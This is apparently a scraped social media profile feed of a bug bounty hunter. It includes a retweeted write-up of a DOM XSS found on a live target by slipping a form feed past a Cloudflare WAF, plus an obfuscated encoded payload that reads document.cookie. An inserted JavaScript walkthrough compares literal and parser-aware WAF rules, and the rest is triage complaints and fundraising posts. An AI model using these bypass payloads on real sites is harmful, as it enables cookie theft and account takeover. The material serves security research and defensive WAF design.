Xiety (@_Xiety)
588 posts

Securing the internet one bug at a time :) | Top 25 @YesWeHack | Founder Of @BountyBrief

Ontario, CA · Joined September 2021
321 Following · 753 Followers
Xiety retweeted
trace37 (@trace37_labs):

Woke up this morning thinking "It's Thursday — no XSS reported this week... ... what will I do for PAYLOAD OF THE WEEK?" Started on a new target last night. Woke up VERY early and found this:

Confirmed DOM XSS → theoretical ATO (still working on that!). Cloudflare WAF bypassed.

The bypass is the interesting part:

onerror=alert(1) → 403
onerror%0c=alert(1) → 200

Note: one character: %0c is a form feed. Cloudflare matches onerror= literally. The HTML spec treats form feed as whitespace — so onerror\x0c= is a valid event handler that CF never sees.

Once past the WAF, the XSS chain was wide open:
- URLSearchParams → Vuex store → v-html / innerHTML
- No sanitisation at any step.
- CSP was report-only — never enforced, so nothing blocked execution.
- Confirmed in all browsers. No auth required.
- Single link from the browser.

Sanitised explanation in the image - plus time-stamped ALERT from just moments ago. You're watching XSS live!!

Report to h1 almost drafted but on hold as I look to escalate to full ATO.

Things worth adding to your methodology:
1. When a WAF blocks your event handler, try whitespace variants before moving on. Form feed, vertical tab, null byte. CF won't always catch them.
2. Vue apps using v-html are worth tracing. It compiles straight to innerHTML. Follow the data into the store.
3. If you see Content-Security-Policy: ... report-only — that's not protection. That's a log file 😄

[tweet media: two images]

Quoting trace37 (@trace37_labs):

Another day, another WAF bypassed, XSS reported and bounty awaited.

param=%22%7D%2C%22*%22)%3Bvar%20d%3DglobalThis%5B%22docu%22%2B%22ment%22%5D%3Bd.body.innerText%3Dd%5B%22do%22%2B%22main%22%5D%2B%22%3A%20%22%2Bd%5B%22coo%22%2B%22kie%22%5D%3B%2F%2F

COME ON WAF's... who's next...?!
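The form-feed bypass in the retweet above, worked through as an added example that is not part of trace37's post and does not reproduce any Cloudflare rule. It contains a small attribute tokenizer that follows the HTML spec's whitespace set for the attribute-name states, a literal "on<name>=" rule of the kind the post describes, and a parser-aware rule that decides on the attribute name the browser would actually produce. The probes, the `PROBES`, `literalWafStatus`, `parserAwareWafStatus` and `evaluateProbe` names, and the 403/200 statuses are all constructed for this illustration.

```javascript
// Added example (not code from trace37's post, not Cloudflare's logic).
// The HTML tokenizer's before-attribute-name, attribute-name and
// after-attribute-name states skip TAB, LF, FF and SPACE (CR is turned into LF
// before tokenization), so "onerror\f=" still yields the attribute "onerror".
// Vertical tab (\x0b) and NUL (\x00) are NOT whitespace in those states: they
// become part of the attribute name, which then no longer spells a handler.
const TAG_WS = new Set(["\t", "\n", "\f", " "]);

// Minimal tokenizer for the attribute list inside a start tag, i.e. the text
// after the tag name, e.g. 'src=x onerror\f=alert(1)'. Returns [{name, value}].
function parseAttributes(tagBody) {
  const attrs = [];
  const n = tagBody.length;
  let i = 0;
  while (i < n) {
    while (i < n && TAG_WS.has(tagBody[i])) i++;        // before attribute name
    if (i >= n || tagBody[i] === ">") break;
    if (tagBody[i] === "/") { i++; continue; }           // self-closing slash
    let name = "";
    while (i < n && !TAG_WS.has(tagBody[i]) && !"=/>".includes(tagBody[i])) {
      // attribute name: ASCII letters are lowercased; NUL becomes U+FFFD per spec
      name += tagBody[i] === "\0" ? "\uFFFD" : tagBody[i].toLowerCase();
      i++;
    }
    while (i < n && TAG_WS.has(tagBody[i])) i++;        // after attribute name
    let value = "";
    if (i < n && tagBody[i] === "=") {
      i++;
      while (i < n && TAG_WS.has(tagBody[i])) i++;      // before attribute value
      if (i < n && (tagBody[i] === '"' || tagBody[i] === "'")) {
        const quote = tagBody[i++];
        while (i < n && tagBody[i] !== quote) value += tagBody[i++];
        i++;                                             // closing quote
      } else {
        while (i < n && !TAG_WS.has(tagBody[i]) && tagBody[i] !== ">") value += tagBody[i++];
      }
    }
    attrs.push({ name, value });
  }
  return attrs;
}

// Event-handler attribute names the browser would actually wire up.
function eventHandlerNames(tagBody) {
  return parseAttributes(tagBody)
    .map((a) => a.name)
    .filter((name) => /^on[a-z]+$/.test(name));
}

// Hypothetical literal rule of the kind the post describes: blocks only when
// "on<letters>=" appears verbatim in the decoded parameter.
function literalWafStatus(decodedParam) {
  return /on[a-z]+=/i.test(decodedParam) ? 403 : 200;
}

// Hypothetical parser-aware rule: tokenize first, then judge the attribute
// name, so any whitespace the HTML spec allows before "=" is irrelevant.
function parserAwareWafStatus(decodedParam) {
  return eventHandlerNames(decodedParam).length > 0 ? 403 : 200;
}

// Constructed probes in the shape of the post's "onerror%0c=" test,
// URL-encoded as they would arrive in a query string.
const PROBES = {
  plain:       "src=x%20onerror=alert(1)",
  formFeed:    "src=x%20onerror%0c=alert(1)",
  verticalTab: "src=x%20onerror%0b=alert(1)",
  nullByte:    "src=x%20onerror%00=alert(1)",
};

function evaluateProbe(encoded) {
  const decoded = decodeURIComponent(encoded);
  return {
    literalWaf: literalWafStatus(decoded),
    parserAwareWaf: parserAwareWafStatus(decoded),
    browserHandlers: eventHandlerNames(decoded),
  };
}

for (const [label, encoded] of Object.entries(PROBES)) {
  console.log(label.padEnd(12), JSON.stringify(evaluateProbe(encoded)));
}
```

Run with `node` and compare the rows: the plain probe is caught by both rules; the form-feed probe slips past the literal rule while the tokenizer still reports `onerror`, which is the gap the post exploits. The vertical-tab and NUL probes also slip past the literal rule, but the tokenizer turns them into the attribute names `onerror\x0b` and `onerror\uFFFD`, so a spec-conformant browser wires up no handler; they are worth trying against a WAF, but only the whitespace characters the attribute-name state actually skips produce a firing payload.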
Xiety (@_Xiety):

My nana is trying to win the fight against stage 4 cancer. Anything helps. Share or a donation helps us out tremendously. gofundme.com/f/Help-Us-Make…
Evan Klein (@EvanKlein338226):

@_Xiety The "informative" mark on valid IDORs is the most frustrating part of this game. Always ask for clarification on scope and push back with clear impact. If they can't articulate why it's not a real issue, escalate.
Xiety (@_Xiety):

Great way to start the day with a Critical IDOR as Informative!

[tweet media: image]
Tal_buggcrowd(parody) (@EubardWells):

@_Xiety @_MrPlanB You have to mention your @yeswehack profile to them, because 0_day_pilot might have added your profile to AI slop groups, and he keeps doing it for many researchers, where they blindly close submissions as "N/A".
Xiety (@_Xiety):

@_MrPlanB Just a better way to say "get scammed": we will fix it and not reward, lol. Used to it.
s0rte (@_MrPlanB):

@_Xiety An exceptional as known issue is wild 🥲
Xiety (@_Xiety):

@_MrPlanB “Known issue”, but it's not written in the known issues on the program, so I'm confused.
s0rte (@_MrPlanB):

@_Xiety Reason for closure?
Tal_buggcrowd(parody) (@EubardWells):

@_Xiety @intigriti Is that my newbie acquaintance 0_day_pilot or commanderstax? They are living in illusions due to huge AI slop. Even this world is a simulation for them!!! No wonder; they watched the Matrix movie series too much and still got high!!! @intigriti
Xiety (@_Xiety):

I have an endpoint where I can inject malicious content into a QR code. Inject and pre-fill messages to numbers, which can be a toll-rate number I set up. Also I can redirect to a malicious site, make the user call a number, etc. Impactful?! @intigriti Triage says no. LOL
Xiety (@_Xiety):

To my bug bounty/infosec family: My Nana was hit with a Stage 4 lung cancer diagnosis. It's aggressive and the costs are stacking up fast. I'm grinding to cover what I can, but I'm asking for a hand. Please consider sharing! gofund.me/452ed087e
Xiety (@_Xiety):

I have an endpoint that allows you to download a user's privately listed video (not *YouTube*, btw), just by visiting the link. Improper access.
Xiety (@_Xiety):

@s4dmach1ne Not toxic at all. If you lack and don't submit, someone else is going to. It won't always be there waiting for you.
s4dmach1ne (@s4dmach1ne):

@_Xiety the FOMO is real and that mindset is toxic imo
Xiety (@_Xiety):

Each day you decide to miss out on hunting for bugs increases your chances of dupes. #Bugbounty
Xiety (@_Xiety):

Is the 0day_pilot on @intigriti a bot? They just closed an HTML injection and an IDOR leaking PII as Informative / Closed, lmao
Xiety (@_Xiety):

@intigriti why is oday_pilot closing impactful bugs? PII disclosure + HTML injection? Makes me want to rethink your platform.